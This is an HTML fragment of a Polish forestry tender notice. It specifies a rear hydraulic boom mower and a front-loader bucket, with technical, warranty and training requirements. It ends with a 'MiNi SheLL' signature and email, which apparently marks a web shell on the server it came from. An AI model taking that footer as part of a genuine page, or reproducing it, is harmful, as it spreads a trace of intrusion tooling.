                <b>Nazwa: </b>część druga:  kosiarki wysięgnikowej (hydraulicznej) tylnej<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>CZĘŚĆ DRUGA:
1.	Przedmiotem zamówienia jest Dostawa ramienia wysięgnikowego (z własnym układem hydraulicznym) tylne z głowicą koszącą  o określonych przez Kupującego parametrach technicznych.
2.	Wskazane parametry są parametrami minimalnymi, które musi ramienia wysięgnikowego (z własnym układem hydraulicznym) tylnego z głowicą koszącą spełniać. 

WYMAGANIA OGÓLNE	OPISAĆ PARAMETR (TAK/NIE)
Maszyny fabrycznie nowe	
Maszyny przystosowane do współpracy z ciągnikiem Valtra 180 i 190  	
Rok produkcji  2016	
Dopuszczony do pracy w Polsce i w krajach Unii Europejskiej	

WYMAGANIA EKSPLOATACYJNE:	OPISAĆ PARAMETR (TAK/NIE)
I GŁOWICA KOSZĄCA	
Miejsce pracy  pobocza dróg leśnych	
Przeznaczony do koszenia trawy i odrostów drzew i krzewów do 80 mm średnicy	
Przewidywany okres eksploatacji 10 lat.	
II RAMIĘ WYSIĘGNIKOWE TYLNE Z WŁASNYM UKŁADEM HYDRAULICZNYM	
Miejsce pracy  pobocza dróg leśnych	
Przystosowane do montażu głowic wymiennych 	
Przewidywany okres eksploatacji 10 lat.	

WYMAGANE GŁÓWNE PARAMETRY TECHNICZNE.:	OPISAĆ PARAMETR (TAK/NIE)
I GŁOWICA KOSZĄCA	
Szerokość głowicy roboczej minimum  1200 mm	
Element roboczy głowicy - nóż typu młoteczek o masie minimum 1,0 kg	
Spiralne ułożenie noży wału bijakowego głowicy	
Prędkość rotora koszącego minimum 3000 obr/min
	
II RAMIĘ WYSIĘGNIKOWE TYLNE Z WŁASNYM UKŁADEM HYDRAULICZNYM	
Zasięg poziomy ramienia z głowicą miniumum 550 cm	
Centralne mocowanie głowicy, oraz możliwość ustawienia jej kąta pracy	
Ramię wyposażone w szybkozłącza hydrauliczne 	
Możliwość montażu innych głowic roboczych: piła tarczowa, odmularka do rowów, równiarka do poboczy	
Przesunięcie ramienia z głowicą do przodu ciągnika miniumum 250 cm od kąta prostego ramienia  widoczność głowicy koszącej przy boku kabiny Ciągnika	
Obrót ramienia głowicy minimum 90 stopni do tyłu, zabezpieczenie najechania na przeszkodę ( bezpiecznik hydrauliczny )	
Zasięg poziomy od osi Ciągnika do głowicy wysuniętej min 250 cm do przodu ciągnika, powinien wynosić min 550 cm	
Płynne kopiowanie głowicy, amortyzacja ramienia	
Hydrauliczne odciążenie ramienia  	
Rzeczywista moc hydrauliczna hydromotoru głównego min. 45 KM	
Moc na silniku hydraulicznym rotora tnącego min. 40 KM	

WYMAGANE STANDARDOWE ELEMENTY WYBRANE Z KATALOGÓW OFEROWANYCH PRZEZ PRODUCENTÓW.:	OPISAĆ PARAMETR (TAK/NIE)
I GŁOWICA KOSZĄCA	
Głowica do trawy i krzewów z rewersem obrotów	
Waga głowicy maksymalnie 310 kg	
II RAMIĘ WYSIĘGNIKOWE TYLNE Z WŁASNYM UKŁADEM HYDRAULICZNYM	
Wydajność oleju 85l/min	
Waga maszyny maksymalnie 1300 kg 
Pojemność zbiornika oleju minimum 190 litrów	
Chłodnica oleju z termostatem	
Wskaźnik temperatury i poziomu oleju	
Sterowania elektryczne za pomocą joysticka	
Dodatkowe stabilizatory maszyny na trój-punkcie pozwalające uzyskać 5 punktowy system mocowania i stabilizacji ramienia kosiarki	
Urządzenie wyposażone jest we wszystkie niezbędne połączenia oraz końcówki umożliwiające podłączenie go do ciągników Valtra 180 i 190.	
Tablice ostrzegawcze	
Oświetlenie drogowe	

WYMAGANE WARUNKI GWARANCJI I OBSŁUGI POGWARANCYJNEJ:	OPISAĆ PARAMETR (TAK/NIE)
Gwarancji udziela Wykonawca zamówienia na okres nie krótszy jak 24 miesiące.	
Wykonawca zabezpieczy serwis techniczny w miejscu pracy przedmiotu zamówienia.	
Udzielona gwarancja obejmuje wady fizyczne i prawne rzeczy sprzedanej w rozumieniu przepisów kodeksu cywilnego	
Wykonawca zobowiązany jest do wskazania w złożonej ofercie autoryzowanego przedstawiciela do zapewnienia kompleksowego serwisu gwarancyjnego i pogwarancyjnego oraz zabezpieczenia części zamiennych.	





WYMAGANA DOKUMENTACJA PRZY DOSTAWIE:	OPISAĆ PARAMETR (TAK/NIE)
Instrukcja eksploatacji i obsługi w języku polskim.	
Książka serwisowa	
Karta gwarancyjna	
Katalog części zamiennych	
Deklaracja zgodności CE/WE dopuszczająca  ramienia wysięgnikowego (z własnym układem hydraulicznym) tylnego z głowicą koszącą do obrotu na terenie na terenie Unii Europejskiej	
Szczegółowa dokumentacja techniczna, folder i zdjęcie oferowanego przedmiotu zamówienia.	



WYMAGANE SZKOLENIE:	OPISAĆ PARAMETR (TAK/NIE)
W miejscu dostawy maszyny wskazanym przez Zamawiającego, Wykonawca przeprowadzi szkolenie dla dwóch operatorów w zakresie obsługi, bezpieczeństwa Pracy i konserwacji. Czas trwania szkolenia  jeden dzień roboczy podzielony na część teoretyczną i praktyczną.	
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>16310000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>30</td></tr><tr><td>Termin płatności</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>część trzecia łyżki do ładowacza czołowego Quicke 75<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>CZĘŚĆ TRZECIA:
1.	Przedmiotem zamówienia jest Dostawa  łyżki  do ładowacza czołowego Quicke 75 o określonych przez Kupującego parametrach technicznych.
2.	Wskazane parametry są parametrami minimalnymi, które musi łyżka  do ładowacza czołowego Quicke 75  spełniać. 
WYMAGANIA OGÓLNE	OPISAĆ PARAMETR (TAK/NIE)
Urządzenie fabrycznie nowe	
Urządzenie przystosowane do współpracy z ładowaczem czołowym Quicke 75  	
Rok produkcji  2016	
Dopuszczony do pracy w Polsce i w krajach Unii Europejskiej	

WYMAGANIA EKSPLOATACYJNE:	OPISAĆ PARAMETR (TAK/NIE)
Miejsce pracy  drogi leśne, posesje czyszczenie placów i rowów.	
Przeznaczony do:
a) Remontu, renowacji dróg leśnych 
b) Czyszczenia placów.
c) Załadunek materiałów sypkich.	
Przewidywany okres eksploatacji 10 lat.	

WYMAGANE GŁÓWNE PARAMETRY TECHNICZNE.:	OPISAĆ PARAMETR (TAK/NIE)
Szerokość robocza  1850 mm	
Pojemność łyżki  700 -750 l.	
Masa łyżki do 220 kg.	
Mocowanie typu Euro - ramka	

WYMAGANE STANDARDOWE ELEMENTY WYBRANE Z KATALOGÓW OFEROWANYCH PRZEZ PRODUCENTÓW.:	OPISAĆ PARAMETR (TAK/NIE)
Wymienne zęby robocze do spulchniania materiału	
Przeznaczona do ciężkich prac	
Zęby robocze do pracy również mniej sypkimi materiałami jak kamienie, grudy ziemi 	
Okrągłe dno łyżki	
Wzmocnienia boczne	
Dolna krawędź tnąca z możliwością montażu zębów 	
Urządzenie wyposażone jest we wszystkie niezbędne połączenia oraz końcówki umożliwiające podłączenie go do ładowacza czołowego Quicke 75.	

WYMAGANE WARUNKI GWARANCJI I OBSŁUGI POGWARANCYJNEJ:	OPISAĆ PARAMETR (TAK/NIE)
Gwarancji udziela Wykonawca zamówienia na okres nie krótszy jak 24 miesiące.	
Wykonawca zabezpieczy serwis techniczny w miejscu pracy przedmiotu zamówienia.	
Udzielona gwarancja obejmuje wady fizyczne i prawne rzeczy sprzedanej w rozumieniu przepisów kodeksu cywilnego	
Wykonawca zobowiązany jest do wskazania w złożonej ofercie autoryzowanego przedstawiciela do zapewnienia kompleksowego serwisu gwarancyjnego i pogwarancyjnego oraz zabezpieczenia części zamiennych.	

WYMAGANA DOKUMENTACJA PRZY DOSTAWIE:	OPISAĆ PARAMETR (TAK/NIE)
Instrukcja eksploatacji i obsługi w języku polskim.	
Książka serwisowa	
Karta gwarancyjna	
Katalog części zamiennych	
Deklaracja zgodności CE/WE dopuszczająca łyżkę do obrotu na terenie na terenie Unii Europejskiej	
Szczegółowa dokumentacja techniczna, folder i zdjęcie oferowanego przedmiotu zamówienia.	

WYMAGANE SZKOLENIE:	OPISAĆ PARAMETR (TAK/NIE)
W miejscu dostawy maszyny wskazanym przez Zamawiającego, Wykonawca przeprowadzi szkolenie dla dwóch
operatorów w zakresie obsługi, bezpieczeństwa Pracy i konserwacji.          Czas trwania szkolenia  cztery godziny robocze podzielone na część teoretyczną i praktyczną.	

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>16810000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>30</td></tr><tr><td>Termin płatności</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com